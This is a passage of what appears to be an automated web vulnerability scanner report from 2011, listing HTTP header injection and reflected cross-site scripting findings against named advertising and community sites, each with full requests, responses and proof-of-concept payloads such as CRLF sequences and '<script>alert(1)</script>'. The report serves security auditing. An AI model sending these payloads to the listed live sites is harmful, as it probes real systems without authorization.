3.3. http://ad.doubleclick.net/adj/fmpub.tweetmeme/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/fmpub.tweetmeme/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 90a37%0d%0a55eb3835e88 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /90a37%0d%0a55eb3835e88/fmpub.tweetmeme/;sz=160x600;fmzid=2673;;fmcls=ATF;tile=1;qcseg=D;qcseg=T;qcseg=2891;qcseg=2867;qcseg=2866;qcseg=2865;qcseg=2363;qcseg=2362;qcseg=2355;qcseg=2353;qcseg=2352;qcseg=2349;qcseg=2339;qcseg=1286;qcseg=1160;qcseg=1159;qcseg=1156;qcseg=1149;qcseg=1148;qcseg=983;ord=9735370394773782; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=600&rand=26297691596
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/90a37
55eb3835e88
/fmpub.tweetmeme/%3Bsz%3D160x600%3Bfmzid%3D2673%3B%3Bfmcls%3DATF%3Btile%3D1%3Bqcseg%3DD%3Bqcseg%3DT%3Bqcseg%3D2891%3Bqcseg%3D2867%3Bqcseg%3D2866%3Bqcseg%3D2865%3Bqcseg%3D2363%3Bqcseg%3D2362%3Bqcseg%3D2355%3Bqcseg%3D2353%3Bqcseg%3D2352%3Bqcseg%3D2349%3Bqcseg%3D2339%3Bqcseg%3D1286%3Bqcseg%3D1160%3Bqcseg%3D1159%3Bqcseg%3D1156%3Bqcseg%3D1149%3Bqcseg%3D1148%3Bqcseg%3D983%3Bord%3D973537:
Date: Tue, 25 Jan 2011 04:26:39 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload f8e54%0d%0a5ad09fe6b0e was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=tf&c=19&mc=imp&pli=2150004&PluID=0&ord=1295907707715&rtu=-1 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=250&rand=53705905654
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0f8e54%0d%0a5ad09fe6b0e; A3=gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001; B3=7lgH0000000001sG852G0000000003sS83xP0000000001sF7gi30000000001sG852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Location: http://ds.serving-sys.com/BurstingCachedScripts/Res/Blank_1x1.gif
Server: Microsoft-IIS/7.5
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0f8e54
5ad09fe6b0e
; expires=Sun, 24-Apr-2011 23: 27:57 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=gNfHaaov0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001; expires=Sun, 24-Apr-2011 23:27:57 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=7lgH0000000001sG852G0000000003sS8cVQ0000000001sV83xP0000000001sF7gi30000000001sG852z0000000001sS852A0000000001sS; expires=Sun, 24-Apr-2011 23:27:57 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Sun, 24-Apr-2011 23:27:57 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Tue, 25 Jan 2011 04:27:57 GMT
Connection: close


3.5. http://community.parenthood.com/kickapps/service/getWidgetSwf.kickAction [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.parenthood.com
Path:   /kickapps/service/getWidgetSwf.kickAction

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9919a%0d%0a8ed3d3a570a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9919a%0d%0a8ed3d3a570a/service/getWidgetSwf.kickAction HTTP/1.1
Host: community.parenthood.com
Proxy-Connection: keep-alive
Referer: http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 25 Jan 2011 04:30:20 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: JSESSIONID=A76D16466300A16AB155473E54F4E0D6; Path=/
Location: http://community.parenthood.com/9919a
8ed3d3a570a
/service/getWidgetSwf.kickAction/index.html
Content-Length: 0
Cache-Control: max-age=7776000
Expires: Mon, 25 Apr 2011 04:30:20 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Type: text/plain; charset=UTF-8


3.6. http://community.parenthood.com/kickapps/service/getWidgetSwf.kickAction [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.parenthood.com
Path:   /kickapps/service/getWidgetSwf.kickAction

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 8b555%0d%0a22151d96637 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /kickapps/service/getWidgetSwf.kickAction?8b555%0d%0a22151d96637=1 HTTP/1.1
Host: community.parenthood.com
Proxy-Connection: keep-alive
Referer: http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 25 Jan 2011 04:29:10 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: JSESSIONID=E15042C488ADD828D1708B6F7E91CB18; Path=/
Location: http://kickapps.yuku.com/kickFlash/KickShell.swf?referralUrl=http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1&widgetHost=kickapps.yuku.com&buildVersion=1.0.589&8b555
22151d96637
=1
Content-Length: 0
Cache-Control: max-age=7776000
Expires: Mon, 25 Apr 2011 04:29:10 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Type: text/plain; charset=UTF-8


3.7. http://java.sun.com/products/plugin/autodl/jinstall-1_4_2-windows-i586.cab [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://java.sun.com
Path:   /products/plugin/autodl/jinstall-1_4_2-windows-i586.cab

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload bbba5%0d%0afd261744c82 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /products/plugin/autodl/jinstall-1_4_2-windows-i586.cabbbba5%0d%0afd261744c82 HTTP/1.1
Host: java.sun.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-Java-System-Web-Server/7.0
Date: Tue, 25 Jan 2011 15:11:12 GMT
Location: /update/1.4.2/jinstall-1_4_2-windows-i586.cabbbba5
fd261744c82

Content-length: 0
Connection: close


3.8. http://kickapps.yuku.com/kickapps/service/getWidget.kickAction [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kickapps.yuku.com
Path:   /kickapps/service/getWidget.kickAction

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload b8001%0d%0adc2701e3e3b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /b8001%0d%0adc2701e3e3b/service/getWidget.kickAction?widgetId=21535&as=40337 HTTP/1.1
Host: kickapps.yuku.com
Proxy-Connection: keep-alive
Referer: http://community.parenthood.com/kickapps/service/getWidgetSwf.kickAction
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 25 Jan 2011 03:04:27 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: JSESSIONID=FD7E83564A2B6498217379533A2EBF6C; Path=/
Set-Cookie: as=40337; Expires=Wed, 26-Jan-2011 03:04:27 GMT; Path=/
Location: http://kickapps.yuku.com/b8001
dc2701e3e3b
/service/getWidget.kickAction/index.html
Content-Length: 0
Cache-Control: max-age=7776000
Expires: Mon, 25 Apr 2011 03:04:27 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Type: text/plain; charset=UTF-8


3.9. http://rd.apmebf.com/w/pg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://rd.apmebf.com
Path:   /w/pg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload b5b5b%0d%0abf598142f7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /b5b5b%0d%0abf598142f7/pg?cont_id=11&d=f&host=media.fastclick.net HTTP/1.1
Host: rd.apmebf.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=fks3qs-58150-1294536375707-a5

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 03:07:45 GMT
Server: Apache/2.2.4 (Unix)
Set-Cookie: S=fks3qs-58150-1294536375707-a5; domain=.apmebf.com; path=/; expires=Thu, 24-Jan-2013 03:07:45 GMT
Location: http://media.fastclick.net/b5b5b
bf598142f7
/pg?cont_id=11&d=f&no_cj_c=0&upsid=517004695355
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Content-Length: 287
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://media.fastclick.net/b5b5b
bf598142f7/pg
...[SNIP]...

3.10. http://rd.apmebf.com/w/pg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://rd.apmebf.com
Path:   /w/pg

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload bfc39%0d%0a8009e591a60 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /w/bfc39%0d%0a8009e591a60?cont_id=11&d=f&host=media.fastclick.net HTTP/1.1
Host: rd.apmebf.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=fks3qs-58150-1294536375707-a5

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 03:07:48 GMT
Server: Apache/2.2.4 (Unix)
Set-Cookie: S=fks3qs-58150-1294536375707-a5; domain=.apmebf.com; path=/; expires=Thu, 24-Jan-2013 03:07:48 GMT
Location: http://media.fastclick.net/w/bfc39
8009e591a60
?cont_id=11&d=f&no_cj_c=0&upsid=517004695355
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Content-Length: 287
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://media.fastclick.net/w/bfc39
8009e591a60
...[SNIP]...

3.11. http://rd.apmebf.com/w/pg [S cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://rd.apmebf.com
Path:   /w/pg

Issue detail

The value of the S cookie is copied into the Set-Cookie response header. The payload b55c0%0d%0a6458ee17d9d was submitted in the S cookie. This caused a response containing an injected HTTP header.

Request

GET /w/pg?cont_id=11&d=f&host=media.fastclick.net HTTP/1.1
Host: rd.apmebf.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=b55c0%0d%0a6458ee17d9d

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 03:07:35 GMT
Server: Apache/2.2.4 (Unix)
Set-Cookie: S=b55c0
6458ee17d9d
; domain=.apmebf.com; path=/; expires=Thu, 24-Jan-2013 03:07:35 GMT
Location: http://media.fastclick.net/w/pg?cont_id=11&d=f&no_cj_c=0&upsid=070567674791
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Content-Length: 271
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://media.fastclick.net/w/pg?cont_id=11&amp;
...[SNIP]...

3.12. http://segnalo.alice.it/post.html.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://segnalo.alice.it
Path:   /post.html.php

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 48606%0d%0a40911a07938 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /48606%0d%0a40911a07938 HTTP/1.1
Host: segnalo.alice.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 13:16:48 GMT
Server: Apache/2.2.3 (Unix)
Location: http://segnalo.virgilio.it/userreq.php?username=48606
40911a07938
&tag=
Vary: Accept-Encoding
Content-Length: 338
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://segnalo.virgilio.it/userreq.php?username
...[SNIP]...

3.13. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the N cookie is copied into the Set-Cookie response header. The payload 75a01%0d%0aefba738129d was submitted in the N cookie. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=AGU&si=17295&pi=M&xs=3&pu=http%253A//www.autobytel.com/x22%2526ifu%253Dhttp%25253A//burp/show/31&v=5.5&cb=96663 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; ANRTT=60848^1^1296494968; TData=99999|^|56780|60739|#|60848; Anxd=x; N=2:faabfca985572b481d74a4897e4d9013,71e5fe306b3f97af479b09e96a0ca00a75a01%0d%0aefba738129d; ATTAC=a3ZzZWc9OTk5OTk6NTY3ODA6NjA3Mzk6NjA4NDg=

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:22:15 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Mon, 24 Jan 2011 22:37:15 GMT
Set-Cookie: ANRTT=60848^1^1296494968|62722^1^1296512535; path=/; expires=Mon, 31-Jan-11 22:22:15 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1295907735^1295909535|17295^1295907735^1295909535; path=/; expires=Mon, 24-Jan-11 22:52:15 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|56780|60739|#|60848|62722; expires=Thu, 19-Jan-12 22:22:15 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: Anxd=x; expires=Tue, 25-Jan-11 04:22:15 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:71e5fe306b3f97af479b09e96a0ca00a75a01
efba738129d
,3c9757ed1e17089910d4221c9c7e35f4; expires=Thu, 19-Jan-12 22:22:15 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTY3ODA6NjA3Mzk6NjA4NDg6NjI3MjI=; expires=Thu, 19-Jan-12 22:22:15 GMT; path=/; domain=.at.atwola.com
Cteonnt-Length: 128
Content-Type: application/x-javascript
Content-Length: 128

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16if17a0kq0bgd';
var ANSL='99999|^|56780|60739|#|60848|62722';
ANRTXR();


3.14. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the si request parameter is copied into the Set-Cookie response header. The payload eca17%0d%0a2d0ccfdc61b was submitted in the si parameter. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=AGU&si=eca17%0d%0a2d0ccfdc61b&pi=M&xs=3&pu=http%253A//www.autobytel.com/x22%2526ifu%253Dhttp%25253A//burp/show/31&v=5.5&cb=96663 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; ANRTT=60848^1^1296494968; TData=99999|^|56780|60739|#|60848; Anxd=x; N=2:faabfca985572b481d74a4897e4d9013,71e5fe306b3f97af479b09e96a0ca00a; ATTAC=a3ZzZWc9OTk5OTk6NTY3ODA6NjA3Mzk6NjA4NDg=

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:20:49 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Mon, 24 Jan 2011 22:35:49 GMT
Set-Cookie: ANRTT=60848^1^1296494968|62722^1^1296512449; path=/; expires=Mon, 31-Jan-11 22:20:49 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1295907649^1295909449|eca17
2d0ccfdc61b
^1295907649^1295909449; path=/; expires=Mon, 24-Jan-11 22:50:49 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|56780|60739|#|60848|62722; expires=Thu, 19-Jan-12 22:20:49 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: Anxd=x; expires=Tue, 25-Jan-11 04:20:49 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:71e5fe306b3f97af479b09e96a0ca00a,3c9757ed1e17089910d4221c9c7e35f4; expires=Thu, 19-Jan-12 22:20:49 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTY3ODA6NjA3Mzk6NjA4NDg6NjI3MjI=; expires=Thu, 19-Jan-12 22:20:49 GMT; path=/; domain=.at.atwola.com
ntCoent-Length: 128
Content-Type: application/x-javascript
Content-Length: 128

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16if17a0kq0bgd';
var ANSL='99999|^|56780|60739|#|60848|62722';
ANRTXR();


3.15. http://www.myproductadvisor.com/mpa/autobytel/setCookie.do [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myproductadvisor.com
Path:   /mpa/autobytel/setCookie.do

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 7d2d3%0d%0a4fb5754f9c5 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /mpa/7d2d3%0d%0a4fb5754f9c5/setCookie.do HTTP/1.1
Host: www.myproductadvisor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 25 Jan 2011 00:08:56 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: UIVERSION_COOKIE=1; Path=/mpa/
Location: http://www.myproductadvisor.com/mpa/base/7d2d3
4fb5754f9c5
/setCookie.do
Content-Length: 0
P3P: policyref="/content/w3c/p3p.xml", CP="NOI DSP NID CURa ADMa DEVa TAIa PSAa PSDa OUR NOR IND COM NAV STA"
Connection: close
Content-Type: text/plain; charset=UTF-8


4. Cross-site scripting (reflected)
There are 2093 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


4.1. http://a.fsdn.com/adops/google/rev2/afc/css/ [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.fsdn.com
Path:   /adops/google/rev2/afc/css/

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 5f85f<script>alert(1)</script>5f7015187b was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adops/google/rev2/afc/css/?fn=afc_sf_lbd_x3.css&id=fad815f85f<script>alert(1)</script>5f7015187b&class= HTTP/1.1
Host: a.fsdn.com
Proxy-Connection: keep-alive
Referer: http://sourceforge.net/softwaremap/?a3f06%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8a4aedca02f=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/css; charset=ISO-8859-1
Vary: Accept-Encoding
Cache-Control: public, max-age=1209600
Expires: Tue, 08 Feb 2011 04:24:44 GMT
Date: Tue, 25 Jan 2011 04:24:44 GMT
Connection: close
Content-Length: 1410

#fad815f85f<script>alert(1)</script>5f7015187b {
   width:728px;
   height:90px;
}

#fad815f85f<script>alert(1)</script>5f7015187b div.google_afc {
   width:728px;
   height:90px;
}

#fad815f85f<script>alert(
...[SNIP]...

4.2. http://ads.tweetmeme.com/serve.js [height parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tweetmeme.com
Path:   /serve.js

Issue detail

The value of the height request parameter is copied into an HTML comment. The payload a75da--><script>alert(1)</script>e874b2130e was submitted in the height parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /serve.js?tag=home_leaderboard_iframe&width=728&height=90a75da--><script>alert(1)</script>e874b2130e&rand=99954773672 HTTP/1.1
Host: ads.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tm_identity=1e736a4ffb2b89d8eb9feef196afe056

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 04:26:48 GMT
Content-Type: text/html
Connection: close
P3P: CP="CAO PSA"
Cache-Control: no-cache, must-revalidate
Expires: Sat, 20 Jul 2000 08:00:00 GMT
Pragma: no-cache
X-Served-By: h00
Content-Length: 8965

